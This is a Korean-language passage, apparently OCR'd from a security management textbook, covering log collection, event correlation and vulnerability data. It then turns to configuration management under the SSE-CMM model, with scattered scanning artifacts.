한 려과기 를 설 계 함으로써 백 색 소음를 려 과하여 정 보관리 의 부담을 덜 어 주어 야 할 과업 
이 나선다. 

보안정 보수집 과 관련하여 나서는 기 초적 인 다른 문제 들도 있 다. 기 록철정 보를 보관 
한 충분한 보관공간의 확보，수집정 보들의 중앙기 록부수집호스트에 로 주기 적 으로 전달하 
는 문제들이 그런 문제들이다. 많은 경우 기록철자료수집에 대한 충분한 계획이 없이 개 
발계획이 실행되군 한다. 이것은 사고가 발생할 때 원인분석을 극히 어렵게 한다. 

기 타 기 록파일 관리문제 들로서 는 기 록철 정 보검 열 을 들수 있 다. 많은 기 관들에 서 는 정 
보가 기 록되 지만 거 의 검 열 해 보지 않아서 어 떤 심 각한 보안위 반행 위 가 있 었는지 잘 모 
르고 있 다. 보안이 단순한 기 술이 상의것 이 라는것 을 고려하면 보안관리공정 은 그 보안에 
쓰이는 기술과 그 책임을 말은 사람들의 자격과 꼭같이 중요하다. 기술적으로 준비된 보 
안관리 자들은 자기 들이 관리하는 기 술을 알아야 할뿐아니 라 보안에 서 기 술의 역 할과 같 
은 기술의 보안상 중요성도 반드시 알아야 한다. 
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기록파일관리 와 그것을 실행 할 해 당기술인원문제는 기 업의 보안방책 에서 제 기되는 
보안관리계획의 한 부분으로 되여야 할것이다. 

자료교환과 보관 

보안정보교환을 위한 업계표준이 없으므로 보안정보관리에서는 큰 문제가 제기되고 
있다. XML 표준이 이 공간을 메꾸어 줄것으로 보고 있지만 업계에서는 아직 널리 보급되 
지 못하고 있다. 따라서 사용자들은 판매 업체 가 정보교환표준을 채택할것을 바라고 있지 
만 말고 판매 업 체 들이 제 공한 각이한 형 식 으로 각이한 원천의 보안정 보들을 관리할 생 각 
을 하여 야 한다. 

XML 과 같은 보안정 보교환표준은 한걸 음에 지 나지 않는다. 장기 적관점 에 서 볼 때 난 
관은 동일한 보안공간에서 각이한 제 품에서 나오는 보안정보를 공통적 으로 어떻 게 분류 
하겠는가 하는 문제이다. 실례로 IDS 들은 자료분류를 꼭같이 하기때문에 어느 한 IDS 가 
생성한 보안사건이 다른 판매 업체 에서 구입한 IDS 가 생성하는 류사한 보안사건과 동일 
한 방식으로 처리된다. 

아직 자료교환을 위한 업 계표준이 없지 만 모든 제 품들은 보안관련정 보들을 하나의 
자료기 지 에 보관할수 있는 능력 은 있 다. 개 방형자료기 지접 속성 ( ODBC ) 을 준수하면 각이 
한 프로그람들과 자료기지들사이의 자료교환이 가능해 진다. 

보관 즉 기 억시키는데서 나서는 문제 는 수집 자료량과 기 억 방식의 결정 이 다. 표준적 
으로 자료기 지 를 설 계하여 수집 정 보를 기 억 혹은 보관시 켜 야 할것 이 다. 그 자료기 지안은 
보안사건들의 분류성 격 과 보관성 격 을 결정해 야 할것 이 다. 

보관요구사항들을 설계할 때 보안관리자들이 고려해 야 할것은 예 비 본만들기 와 예 비 
본풀어보기 특성 들과 갈은 알려 진 문제 들이 다. 기 타 문제 는 높은 리용성 과 원격접 근성 을 
제 공하는것 이 다. 

호상관계와 분석 

기업전반의 보안적안목을 가지기 위해서는 보안정보가 회사전반에 걸쳐 종합되여야 
한다. 이것은 기 업망의 각이한 장치들(침 입탐지체 계，방화벽，체계호스트，응용프로그람， 
경 로기，교환기 등)에 서 오는 정 보들을 포괄한다. 이 상의 정 보들은 취 약성자료와 함께 기 
관의 보안태세를 확인할수 있게 한다. 

기록철자료분석 

종국적 으로 보면 보안정 보분석은 해 당 기 술적위험 을 더 잘 료해하자는데 그 목적 이 
있 다. 또한 영 업 위 험 관리에 도 유용한 정 보로 될수 있을것 이 다. 

정보종합원칙은 개별적부분들에서 오는 정보의 합이 부분들이 모여 진 전체에서 오 
는 정보보다 못하다는 사실에 기초하고 있다. 기업에서 생성된 있을수 있는 보안관계사 
건들의 수가 주어 지면 그와 관련된 보안전문정보나 사건을 의미 있게 련관시키는것이 
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곧 난관으로 제기된다. 

IDS 에 의하여 람지된 보안사건은 기 업의 DMZ 에 있는 방화벽 이 나 Web 봉사기 가 기 
록한 류사한 사건과 관계되는것일수 있다. 사실 이러한 사건은 DMZ 뒤에 있는 후위처리 
콤퓨터 들의 특정 한 활동과 관계 되 는것 일 수도 있 다. 

사건들의 호상관계 는 보안관계사건의 성격 에 대 하여 통찰력 을 가지게 한다. 그리하 
여 기관망에 주는 일이 일어 났다고 하면 그 사건이 어떻게 되여 일어 났는가 하는데 대 
한 각이한 흐름의 씨 나리오를 써 낼수 있 다. 

( 균 ) 布 SS 과 (S) 


기업체 



그림 25-1. 정보수집과 호상관계 

비 무장지 대 (DMZ) 에 설 치된 IDS 에 의해 람지된 사건의 례 를 들어 보자. 방화벽 이 이 
것을 람지하지 못하였다고 보자. 그것은 방화벽설정을 제대로 잘하지 못한 탓일수 있다. 
방화벽이 만일 그 사건을 람지하고 차단하였다면 좋을것이다. 그러나 그렇게 하지 못하 
였 다면 조사를 하여 야 한다. DMZ 에 서 Web 봉사기 가 잡아 내 였 다면 그때 에 는 우려해 야 
할 근거가 있다. 호상관계는 또한 공격 받는 장치의 중요성에 기초하여 해당한 반응을 
결부시 켜 주기 도 한다- 

방화벽에서 관찰되는 보안사건들을 방화벽에서 관찰되는 사건들 그리고(필요하면) 
DMZ 와 지 어 DMZ 뒤 에 있는 후위응용프로그람들에서 일 어 나는 사건들과 련결시켜 보는 
것 이 그럴듯하다. 결과 얻 어 진 종합적 인 정 황판단결과는 강력하여 기 관의 보안관계 사건 
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들을 보다 총체적 으로 보여 준다. 

사건호상관계를 잘 그리려면 기업전반의 전략이 내용 있게 되여야 한다. 그림 25-1 
은 정보의 수집과 호상관계에 대한 하나의 구성방식을 보여 준다. 이 실례에서는 동등관 
계로 설정된 수집자들과 주종관계로 설정된 수집자들을 보여 준다. 동등관계의 수집자들 
은 의견교환에서 류사한 통제 를 할수 있 다. 주종관계 는 그 문제안의 통제 권을 보유하고 
있 다. 

일이 잘 되자면 그리고 기관의 보안태세의 총체를 보여 주자면 수집자들은 여 러가지 
다양한 원천 즉 사건기록파일，체계기록파일，침입람지체 계，방화벽，경로기，교환기들에 
서 나오는 모든 정 보들을 처 리할수 있는 능력 을 가져 야 한다. 특별수집 자들을 망장치 (례 
하면 방화벽 )들에 배 치하면 방화벽 보안설정 을 한눈에 볼수 있을것 이 다. 

우의 실례는 수집자들이 기업전반에 배치되였으나 기업구성방식에 따라 배치된 가능 
한 하나의 씨 나리오를 보여줄따름이 다. 이렇게 되면 기 업의 각 단위들이 자기단위의 정 
보를 수집하여 자기 선을 따라 해 당 플래 그신호가 있는 정 보만 종합적 형 태 로 올려 보내 
여 기 업보안태 세 에 대 한 종합적그림 을 그리 는데 도움을 줄수 있 다. 

정보보고체 계를 달리 조작할수 있는 다른 모형도 있을수 있다. 실례 로 수집 자배 치방식 
을 동등위치관계，주종관계로 할수도 있고 량자를 결합시키는 방식으로 할수도 있다. 각 
기 관들은 어 느 모형 이 자기 들에 게 가장 적 합한가에 대 하여 결 심 채 택 을 잘 하여 야 한다. 

취약성자료 

기록자료분석과 호상련계설정 이 물론 기관의 《적극적보안》의 한 구성요소로서 중 
요하기 는 하지 만 그것 만 가지 고서 는 기 업보안태 세 를 충분히 담보할수 없 다. 

표준적 으로 볼 때 망평 가자료에 서 취 약성자료들을 가져 다 더 분석해 보아야 한다. 

취 약성자료라고 하면 그것은 대체 로 열 려 진 포구의 개수，가동중인 봉사형 태들，해 
당 봉사가 막기 힘 든 정 보로출형 태，이 정 보로출의 잠재 적심 각성 과 갈은것 들을 발견하는 
데 목적을 둔 스캔을 말한다. 

취 약성자료들을 어 떻게 관리해 야 하는가에 대 한 지 침서는 현재 얼마 없다. 그러 나 
자료채취를 하면 다음의 측면들을 포함한 내용을 알수 있게 된다. 

• 해 당 망토막에 서 의 취 약성개 수에 기 초한 위 험 상태표(례 : 매 망당 위 험 상태 , 매 
부서당 위 험 상태 등) 

• 고위험도 및 저위험도취약성비률에 대한 측정값 

• 각이한 시점의 스캔에 기초한 취약성자료의 경향지표，이러한 경향들을 보간하 
거 나 외삽하면 현보안상태 에서 개선될 점들을 명백 히 알수도 있고 또 개선되 였 
는가 하는것도 알수 있다. 

특별위 험상태표들은 근원분석 에 유익하다. 일부 취 약성위 험상태표들을 보면 보안계 
획작성，설계，실행 과정 과 갈은 수많은 요인들과 관련된 특유한 약점 들과 함께 보안공정 
의 강도 같은것을 잘 알수 있다. 




보안실행자들에게 있어서 난관은 보안관리를 개선할수 있도록 취약성자료를 제공하 
는 최선의 방도를 결정하는것 이 다. 구체적으로 보면 호상련계설정으로부터 얻은 교훈，취 
약성 자료에서의 경향성，성능측정값과 함께 근원분석 등을 념두에 둘수 있다. 또한 이 내 
용들도 보안관리 에 유용하지 만 최종목적은 결국 기술적 취 약성정 보를 기 업위험과 련관시 
켜 보는것이다. 총체적자료는 충분하지 못해도 일정한 취약성자료를 장악하면 있을수 있 
는 기업위험이 어떤 형태로 나타나겠는가 하는것을 알수 있다. 돈 파커와 갈은 일부 사 
람들은 이런 방법 이 적합하지 않다고 본다. 파커는 있을수 있는 보안사고를 피하는데 드 
는 비용은 절대로 량적으로 계산할수 없다는 사실에 기초하여 응당한 관심을 돌릴것을 
주장한다. 


요약과 결론 


기업안에는 각이한 보안정보원천이 있어서 보안정보를 여러가지 망기능을 수행하는 
장치들로부터 받아 본다. 방화벽이나 침입탐지체계와 갈은 기술들이 보안강화에서 관건 
적역할을 한다면 경로기，교환기나 체계기록파일들에서 나오는 정보들은 기관의 보안상 
태를 단번에 보여 준다. 

보안관리자들에게는 보안관리공정에 통보하고 그 공정을 개선할수 있는 방향에서 정 
보를 수집，보관，분석해야 하는 어 려운 과업 이 나서고 있다. 보안은 기술에 상당히 의존 
하지만 이 문제는 여전히 보안을 담당한 사람들과 보안을 둘러 싼 공정과 관련된 문제라 
는것을 잊지 말아야 한다. 

정 보수집 전 략에 는 전 략적 위 치 들에 려 과체 계 를 응용하는것 도 있 는바 이 때 통과되 여 야 
할 정보만 통과시키는 려과장치가 완벽해야 한다. 지능형요소들을 리용하면 정보수집과 
종합을 사용성 높게 진행함으로써 중앙에서 집계된 정보량을 최소화할수 있게 될것이다. 
보안관리 앞에 나선 또 하나의 어려운 과업은 기업보안의 여 러 측면들에 대한 측정기준을 
세우는것이다. 여기에는 특정한 위험성이 있는 망장치들의 백분률 갈은 계측자료들이 속 
한다. 또한 이 계 측자료들을 리 용하여 근원분석 함으로써 콤퓨터사용환경 에서 제 기되는 
문제들을 발견하고 해명할수도 있다. 그 이외의 문제는 기술적측정값과 기업위험측정값 
과의 련관관계를 맺어 주는 능력 이다. 

또 있다. 일정한 기간안에 기술적위험수를 장악하면 경향성을 찾아 낼수 있다. 이 경 
향성은 일정한 기간안에 기관의 보안태세를 확립하는데 개선이 있었는가를 보여 준다. 

망기술의 기능들을 리해하는것외에도 여 러가지 기 타 난관들이 보안 및 위험관리 
자들에게 제기된다. 보안관리가 매우 복잡한 과정이라는 현실을 제적 파악하는것은 
일단계에 지나지 않는다. 다음단계는 정보관리공정들과 방도들을 명백히 규정하는것 
이다. 보안공정에 통지하여 보안태세향상에 기여하도록 하는 방향에서 정보를 리용한 
다면 그것은 하나의 큰 공적으로 될것 이다. 마지막으로 기업위험관리에 실지 쓸수 있 
는 계측지표들과 경향성을 명확히 규정하는것은 앞으로 하나의 중요한 과제로 나설 
것 이 다. 
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제 2 6 장. 구성관리 


몰리 크렌케 
데이비드 크렌케 

구성관리 ( CM ) 는 보안실행 에서의 일관성，완전성，엄밀성 을 보장한다. 구성관리는 또 
한 하나의 공정이며 방도로서 기관의 현보안태세 즉 사용되는 기술，수행되는 공정들과 
실 천，기 업 보안상태의 변화에 주는 영 향을 분석하는 도구로 복무한다. 새 로운 기 술의 도 
입 이 일정 에 오르면 여 러 가지 관점 에 서 분석해 봄으로써 그 효과를 결정할수 있 다. 

• 구입，설치，유지 및 감시 비용 

• 현존기 술 및 구성 요소들과의 긍정 적 및 부정 적호상관계 

• 성능 

• 보호수준 

• 사용상편리 

• 그 기능을 실 현 하기 위하여 수정해 야 할 관리 방식 

• 그 새 로운 기 술의 정 확한 리 용을 위한 사용자 및 제 공자양성 과 관련되 는 인적 자원 

구성관리 기 능들은 기 관의 현보안상태 를 조종하여 기 관의 목적 을 달성하는데 서 미 래 
의 길을 밝혀 주는 근본문제로 된다. 그러나 과정적인 견지에서만 구성관리를 대하게 되 
면 기관의 정보보안상태를 개선하며 사업성과를 지원하는 중요한 공정들을 보지 못하는 
결 과를 초래할수 있 다. 

체 계보안능력 성 숙모형 ( SSE - CMM ) 은 주요요소들과 방책 들，절 차적 인 실례 들을 제 시 
하는데 리 용된 장기 적안목이 있는 기 성참고서 들과 함께 CM 의 서 술에 서 기 본틀거 리 를 
이루게 될것이다. 


SSE - CMM 에 대한 개팔 


SSE - CMM 은 보안처 리 를 정 확히 함으로써 하드웨 어，쏘프트웨 어자료를 비 롯한 기 관 
의 정보자원들을 보호할수 있는 기관내 보안공학적과정의 기본특징들을 서술하고 있다. 
SSE - CMM 모형은 다음의 문제들을 다룬다. 

• 개념정의，요구분석，설계，개발，통합，설치，운영，유지보수，페기과정을 포괄한 
전체 체계의 생명주기 

• 경 영 진의 사업，부서 별 사업，공학적활동들을 비 롯한 기 관전체 와 개 발자，통합자 
들을 비 롯한 보안봉사를 진행하는 전체 부서 성 원들 
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표 26-1 


정보보안발기안들 


명칭 

목적 

방법 

범위 

SSE-CMM 

보안공학능력을 정의， 

개선，평가하는것 

지속적인 보안공학의 

성숙모형과 평가방법 

보안공학기관들 

SE-CMM 

체계 및 제품공학공정의 

향상 

체 계공학실천과 평가방 

법의 지속적인 성숙모형 

체계공학기관들 

쏘프트웨어를 위한 S 

EI-CMM 

쏘프트웨어개발관리의 

향상 

쏘프트웨어공학 및 관리 

실천의 단계적성숙모형 

쏘프트웨 어 공학기 관들 

신뢰성 있는 CMM 

높은 무결성쏘프트웨어개 

발공정과 그 환경의 개선 

쏘프트웨어공학운용 

보안의 단계적성숙 

모형 

높은 무결성 

쏘프트웨 어 기 관들 

CMM1 

현존공정개선모형들을 

단일구조형식으로 

통합하는것 

공정개선구성요소들을 

분류，통합，배치하여 

필요한 모형을 만든다 

공학기관들 

Sys, Eng, CM 

(EIA 구 31) 

체계공학능력의 정의， 

향상，접근 

지속적인 공학적성숙 

모형과 평 가방법 

체계공학기관들 

공동기준 

재사용성보호자료들을 

기술강의에 리용함으로써 

보안을 향상시키는것 

보안의 기술적 및 담보적 

요구사항들과 함께 

평가공정수립 

정보기술 

CISSP 

보안전문가라는 학문 

분야를 사회적으로 

인정하게 하는것 

보안지식총체와 보안 

전문가 자격시험 

보안실천가들 

담보틀거 리 

넓은 범위의 증거를 

제공함으로써 보안 

담보를 개선하는것 

체계적인 방법으로 담보 

론리를 전개하여 효과적 

으로 증명하는것 

보안공학기관들 

ISO 9001 

기관적인 품질관리를 

개선 하는것 

품질관리공정에 대한 

구체적인 요구사항 

봉사기관들 

ISO 15504 

쏘프트웨어의 공정 및 

평가의 개선 

쏘프트웨어공정개선 

모형과 평 가방법 

쏘프트웨 어 공학 

기관들 

ISO 13335 

정보기술보안관리의 

개선 

해당수준의 정보 및 봉사 

의 보안을 달성하고 유지 

보안공학기관들 


하는데 필요한 4. 도와 
일정 




• 체계들，쏘프트웨어，하드웨어，인적요인들과 같은 기타 분야와의 동시적인 호상 
관계; 체계관리，체계운영，체 계유지 및 보수 

• 구입，체계관리，보증，인가，평 가를 비롯한 기 타 기능들과의 호상작용 

• 상업기관，정부기관，학술기관 등 각종 보안관련기관들 

SSE - CMM 과 기타 발기안들과의 관계 

표 26-1 에 서 는 SSE - CMM 이 정 보체 계보안과 보안공학의 구조，일 관성，담보성 과 전 
문가수준을 다루는 다른 발기안들과 어 떤 관계 가 있 는가를 보여 준다. 

CMM 틀거리 

CMM 은 림시적 이며 덜 조직화되고 덜 효과적 인 상태로부터 고도로 구조화되고 효과적안 
상태로 보안공학기관을 만들어 내기 위한 하나의 틀거려이다. 이러한 모형을 사용하면 각 기관 
들은 보안실현을 통계학적공정의 조종하에 진행함으로써 그 처리능력을 높이는 하나의 수단으 
로 된다. SSE~CMM 參，:,보안공학에 통계적공정조종의 개 념을 도입 하면 예상된 범위의 원가，시 간 
표，질범위 내에서 안전체계와 신뢰제품의 개발이 촉진될것이라는것을 예견하여 개발되였다. 

-SSE-CMM 2.0 판，1999년 4월 1일 

하나의 공정 이 란 해 당 목적 을 달성 하기 위하여 수행 되 는 활동들의 모임 을 말한다. 정 확 
히 정의된 공정 에는 활동들，비활동의 입구 및 출구결과물들，그 활동수행 을 조종하는 장치들 
이 속한다. 정의된 공정은 기 관이 공식 적 으로 해 석하며 그 기 관의 보안전문가들이 사용할수 
있게 하며 어떤 행동을 취하여야 하는가 하는것도 밝혀 주어야 한다. 수행된 공정은 실지 보 
안전문가가 실행한 행동이 다. 공정성숙은 해 당 공정의 정의，관리，계 측，조종，효과의 정도를 
보여 준다. 공정 성 숙은 잠재 적 인 능력개 선을 알려 주며 기 관의 공정 과 그것 이 기 관전반에 구 
현된 일 관성정 도들의 풍부성 을 다 같이 보여 준다. 

-SSE-CMM 2.0 판，1999년 4월1일 - 


보안공학성숙과 관련된 능력수준 

SSE - CMM 성숙모형과 관련하여서는 능력의 개성을 보여 주는 5가지 능력수준이 있 
다(그림 26-1 참조). 성숙정도에 따라 능력수준의 순서를 정하였으며 매 수준에는 일반 
화된 실천내용을 보여 주었다. 따라서 보다 높은 수준의 공정능력을 보여 주는 일반화된 
실 천내 용들은 능력항목들의 제 일우에 놓인다. 

SSE-CMM 은 일 반화된 실천내 용의 실현에 대 한 구체 적 인 요구사항을 제시하지 않는다. 
작 기 관들은 공정의 계 획，추적，정 의，조종，개선을 자기의 실정 에 맞게 자유롭게 진행할수 
있다. 그러나 웃준위의 일반실천이 아래준위의 일반실천에 의존하게 되기때문에 아래준위의 
일반실천을 진행한 다음에 웃준위일반실천을 수행하는것이 좋다. 

-SSE-CMM, 제 2.0 판 1999년 4월 1일- 
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기 초실 천 이 

• 실행결의 

• 표준공정 을 

• 측정 가능한 

• 량적 공정 효과성 

진행됨 

좋다. 

정의 한다. 

품질목표를 

목표를 설정 


• 실행을 계획 

• 표준공정 을 자 

설정 한다. 

한다. 


화한다. 

기 실정에 맞 

• 목적 달성을 

• 공정 효과성을 


• 실행에서 

게 수행한다. 

위한 공정능 

높 인다. 


규률 있다. 

• 자료를 리용 

력을 결정 



• 실행을 추적 

한다. 

한다. 



한다. 

• 정의된 공정을 

• 객관적으로 



• 실행을 확인 

수행 한다. 

실행을 관리 



한다. 


한다. 



그림 26-1. 보안공학기관의 능력수준 


CMM 으 I 제도^ 


제도화는 하부시설과 기업문화의 수립으로서 방법，실천，절차들을 그 초기정의자 
들이 사라진 후에 도 구축하여 준다. SSE - CMM 의 공정능력측면은 정 량적관리 와 지 속 
적 개선에 로의 실 천과 방향을 밝혀 줌으로써 제 도화에 도움을 준다. CM 공정 과 그 관련 
기초실천들이 성숙되고 지속적으로 개선되면 다음의 특성들을 가지는 활동들을 진행 
할수 있다. 

• 지속성 이전에 체득한 지식이 앞으로도 리용된다. 

• 반복성 개발계획들이 계속 성공을 반복하게 하는 방도 

• 효률성 개 발자들과 평 가자들이 보다 효률적 으로 일할수 있는 방도 

• 담보성 보안요구가 해결된다는 확신 

보안공학모형의 목표 

SSE - CMM 은 가장 널 리 알려 진 보안공학실 천들의 집 합체이 며 새 로 태 여 나는 분야 
이 다. 그러 나 여기 에도 일 련의 총체적목표가 있다. 이 목표들욘 정 보자원의 보호를 위하 
여 투쟁하는 기 타 기 관들(표 26-1 참조)의 지 원을 받고 있는것들도 많다. 



• 기업의 보안위험에 대한 리해를 도모하는것 

• 밝혀 진 위험요소들에 따라 균형적 인 보안요구안을 수립하는것 

• 보안요구사항을 보안지도에 구현하여 다른 분야의 사업에 통합시키며 체계설정 
과 체계운영지도서에 반영하는것 

• 보안의 제도적장치의 정확성과 효과성에 대한 신뢰를 구축하는것 

• 체계나 그 운영에 남아 있는 잔여적인 보안상 취약점들이 운영상 영향이 허용될 
수 있는것인가에 대하여 결심채택하는것 

• 모든 보안공학관련분야와 전문부문들의 노력을 합치여 하나의 체계의 신뢰성을 
일치하게 리해하도록 하는것 


보안 공학 


정보기술보안이 현시기 보안 및 기업환경에서 추동력으로 되는 분야이기는 하지만 
보다 전통적인 보안분야도 결코 도외시하지 말아야 한다. 이러한 기타 보안분야들은 다 
음과 갈다. 

• 운영보안 

• 정보보안 

• 망보안 

• 물리적보안 

• 인적보안 

• 행정적보안 

• 통신보안 

• 방사성보안 

• 콤퓨터보안 

보안공학적공정에 대한 개팔 

보안공학적공정은 위험관리，공학，담보의 세가지 기본분야를 포괄한다. 위험관리 
공정에서는 개발된 제품이나 체계에 i 어 있는 위험요소들을 발견하고 그 순위를 매 
겨 놓는 공정이다. 보안공학공정은 다른 공학분야들과 협동하여 그 위험요소들이 제 
기하는 문제에 대한 해결방도들을 찾아 내고 실현하는 공정이다. 담보공정은 보안해 
결책에 대한 신뢰를 구축하고 고객들이나 경영진에 그 신뢰를 전달하는 공정이다. 이 
러한 작은 공정들은 서로 협동하여 보안공학공정결과로 설정된 목표를 달성하도록 
한다. 

위험관리. 위험관리는 위험요소들，취 약점들，그 영향들을 다룬다. SSE-CMM 의 한 
공정 인 위 험관리는 위험 을 발견하고 그 량을 측정하여 기 관에 접수될수 있는 수준의 허 
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용위 험 을 확정 하는 공정 이 다. 위 험 관리 공정 을 지 원 하는 보안실 천 분야들은 보안위 협 분석， 
영 향분석，취 약성 분석 분야들이 다. 

공학. 보안기사들은 고객들과 협동하여 밝혀 낸 위험요소들，해당법률，기관의 방 
책들과 현존 정보설정값들에 기초하여 보안요구사항들을 확정한다. 보안공학은 개념， 
설계，실행，시험，전개，운영，유지보수，폐기를 포괄하는 공정이다. 이 공정은 체계 
공학림의 기타 부분과 긴밀히 협조하고 의견을 나누어 해당 목적을 달성하기 위한 
활동들을 조절함으로써 보안이 그 공정의 전일적인 하나의 요소로 되도록 할것을 요 
구한다. 일단 보안필요사항이 확정되면 보안기사들은 구체적인 요구사항들을 확정해 
야 한다. 

공학적공정을 지원하는 보안실천분야는 보안의 필요성들을 지적하며 보안상 입력항 
목을 제 시 하며 보안통제 를 실시 하며 보안태세 를 감시 하는것 들이 다. 생 명 주기 의 후반기 에 
는 보안기사들로 하여금 제품들과 체계들이 예견되는 위험성들과의 관계에 부합되게 정 
확히 결정되였는가를 확인하게 함으로써 새로운 위험요소들이 체계가 불안전한 운영을 
하지 않게끔 하는것 이 필요하다. 

담보. 담보는 보안상요구가 만족되였다는 신뢰성의 정도를 말한다. 통제가 실현되 
였고 또 앞으로도 예견한대로 작용할것이며 예견된 위험을 줄일것이라는 담보는 흔히 
론증의 형식으로 통보되며 보안공학적활동의 정상과정에 만들어 진 문건으로 확인되게 
된 다. 

보안공학의 기초적인 공정분야들 

SSE-CMM 은 약 60가지의 보안기준실천사항들을 담고 있으며 보안공학의 모든 주요 
분야들을 포괄하는 11개의 공정분야로 되여 있으며 현재 보안공학계의 가장 좋은 실천내 
용들을 반영하고 있 다. 

기준실천들은 기 업의 생명주기전반에 해 당하며 기 타기준실천들과 겹치지 않으며 보 
안부문에서 하나의 최선의 실천으로 되며(최첨 단기법으로는 되지 못함) 다중적 인 기업환 
경 에 다중적 인 방법 을 사용할수 있 게 하며 특수한 방법 이 나 도구를 구체 적 으로 지 정하지 
않는다. 11개의 SSE-CMM 공정부문들을 아래에 제시하였는데 하나의 실천을 생명주기의 
한 단계로 보지 말아야 한다. 

• 보안통제 를 실 시한다. 

• 영 향을 분석한다. 

• 보안위 험 을 분석한다. 

• 위 험 요소들을 분석한다. 

• 취 약성 을 분석한다. 

• 담보의 근거를 마련한다. 

• 보안을 조정한다. 

• 보안상태 를 감시한다. 

• 보안입 력 사항을 계 시한다. 
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• 보안요구사항을 구체화한다. 

• 보안을 확인하고 비준한다. 

보안공학의 개발계획과 기관적인 실천 

개발계획과 기관적인 실천과 관련되는 11가지의 공정분야들도 있다. 

• 질을 보장한다. 

• 구성을 관리 한다. 

• 개발계획의 위험을 관리한다. 

• 기술적노력을 감시 하고 조종한다. 

• 기술적노력을 계획화한다. 

• 기관의 체계공학공정을 정의 한다. 

• 기관의 체계공학공정을 개선한다. 

• 계 렬제 품 (product line ) 형성 을 관리한다. 

• 체 계의 공학적지원환경 을 관리한다. 

• 계속 숙련하고 지식을 습득한다. 

• 상품제 공자들과 조정한다. 

기 준실 천 항목들과 개 발계 획 및 기 관적 인 실 천 항목들을 제 시한것 은 독자에 게 이 장이 
설정관리 의 리용과 실 천에 초점 을 두고 있 다는 관점 을 주자는데 목적 이 있 다. 

구성 관리 


여 기 에서 는 SSE-CMM PA 13항목 즉《구성관리》와 관련한 기 준실천사항들을 보 
여 주고 기 관의 정 보자원보안의 수립，실행，개 선에 서 나서는 방책，절 차 및 자원들을 
다룬 다. 

구성관리에 대한 해설 

구성관리 ( CM ) 의 목적 은 밝혀 진 구성단위 들에 대 한 자료와 그 단위 들의 상태 를 유 
지하며 체계와 구성단위들에서 나타나는 변화들을 분석조종하는것이다. 체계구성을 관리 
한다는것 은 개 발자들과 고객 들에 게 정 확한 현 구성자료들과 상태 를 제 공한다는것 을 말한 
다. 목표는 기 성사업 결 과구성 에 대 한 통제 및 조종을 실 현 하는것 이 다. 
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구성관리의 기준실천사항 


다음의것들이 정확한 보안공학적 CM 의 핵심요소라고 볼수 있는 기준실천사항들이다. 

• CM 의 방법 론을 수립하라. 

• 구성단위 들을 식 별 하라. 

• 사업결과들의 기준선들을 보존하라. 

• 설정 된 구성단위 에 대 한 변화를 통제하라. 

• 구성상태를 통보하라. 

매개의 기준실천사항들을 아래에서 구체적으로 보자. 서술방식은 SSE - CMM 에 대한 
해설，모범으로 되는 사업결과，그에 대한 설명으로 순서가 되여 있다. 그 다음에는 기준 
실천사항을 실현하는데 리용될수 있는 기타 참고서들과 자원들을 제시한다. 

구성관리의 방법론들 수립하라 

다른 보안참고서들과의 호상관계 

CM 공정 을 지 원할수 있는 CM 도구를 선택하는것 은 기 업공정 들과 구성 될 해 당 자원 
들에 달려 있다(표 26-2 참조). 

표 26-2 BP .13. 01 -CM 방법론을 수립한다 

해설 

CM 의 구조와 원가에 영 향을 줄수 있는 세 가지 기 본선택안들은 다음과 갈다. 

• 구성단위선택의 구체화수준 

• 구성단위 들이 CM 밑 에 들어 가는 시 기 

• CM 과정에 필요한 절차화수준 

사업결과의 실례 

• 구성단위 들을 선정 하는 기 준지표 

• 구성 단위 들을 CM 밑 에 맡기 는 시 간선 

• 선택된 CM 공정 

• 선택 된 CM 공정해 설서 설 명 

주의 

구성단위 에 대 한 선택 기 준들은 대 면부보수유지，사용자의 독특한 요구사항， 

새 설계 대 개조설계관계，변화예견률 등을 고려해야 한다. 


SSE-CMM, 제 2.0 판，1999년 4월 1일， 213-214 페지 




《안전，품질，시간표，원가，환경에 영향을 줄수 있는 정보라면 그 어떤것이든 관리 
해 야 한다. 공급사슬속에 있는 매 활동은 관리공정 에 속해 야 한다. …최 상의 CM 공정 이 
란 변화에 가장 잘 적용할수 있으며 모든 해당정보가 명백하고 간결하며 가치를 가질수 
있게 하는 공정을 말한다.》 

CM 공정은 그것이 실행될 조건과 환경과 결부되여야 한다. 관계된 활동들에서는 책 
임 분담，인원양성，사업 능률의 측정 단위 의 결정 이 포함되 여 야 한다. 구성관리 계 획 ( CMP ) 을 
세우면 CM 과 국제표준화기구 ( ISO ) 9000계렬의 품질체계기준을 호상 련결시킬수 있다. 
이 계획을 세우면 또한 자동도구들을 비롯한 소요자원과 설비들에 대한 설명을 쉽게 할 
수 있다. 

자동도구들 

구성관리연구소. 구성관리연구소 ( ICM ) 에 서 승인을 받은 도구들은 여 러 가지 이 다. 그 
도구들은 ICM 이 정 의한 ( CMII 로 표시 됨 ) 하나의 (새 로운) 구성방법 론을 지 원할수 있는것 
으로 하여 승인을 받았다. 그 도구들은 표 26 — 3에 서술되였다. 

표 26-3 ICM 의 CMII 이 승인한 자동도구들 


체계 부류 

체계 이름 

출하 및 판본 

제 공자이 틈/싸이 트 

승인 날자 

PDM 

Metaphase 

3.2 

SDRD/Methphase 

www.SDRD.com 

2000년 5월 12일 

PDM 

Axalant-CM 

1.4 

U sb/Eiger+Partner 

www.usbmuc.com 

www.ep-ag.com 

2000년 12월 8일 


ICM 의 승인은 다음과 같은 내 용을 의 미한다. 

• 도구가 CMII 기 능들의 핵 심 요소들의 달성 을 지 원 한다. 

• 도구가 그 부류의 도구들에 필요되는 모든 분야의 기능들에서 강력성의 잠재력 
을 가지고 있다. 

• 개 발자는 CMII 와 관련된 그 도구의 장점 과 약점 을 리해 하고 동의한다. 

• 개발자는 이러한 약점들을 극복하기 위하여 개선사업을 진행하기로 계획한다. 

• 이렇게 하려는 개발자의 의견에 ICM 은 동의한다. 

기타자동도구들. IBM 메인프레 임환경 에 서 리용되 는 또 하나의 자동쏘프트웨 어 관 
리 도구는 ENDEVOR 이 다. 이 제 품은 체 계 가동을 위한 모든 프로그람 원천코드，대 상 
코드，실행 코드(적재모둘들)，번역 기능코드，조종정 보，해 당 문건들의 이 관을 자동화할 
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수 있다. 여기에는 고준위프로그람작성언어로 씌여 진 원천프로그람，작업통제 및 기 
타 통제언어，자료사전，조작체계，자료기지구성부문들,: 직결원격처리체계，작업절차 
등이 포함되여 있다. 

상업 적 으로 구매할수 있는 두가지 직 결 CM 도구들은 UNIX 의 원천코드조종체 계 (SCC 
S ) 와 수정 조종체 계 ( RCS ) 이 다. 


도구의 역할들 하는 구성관리계획과 구성틍제위원회 

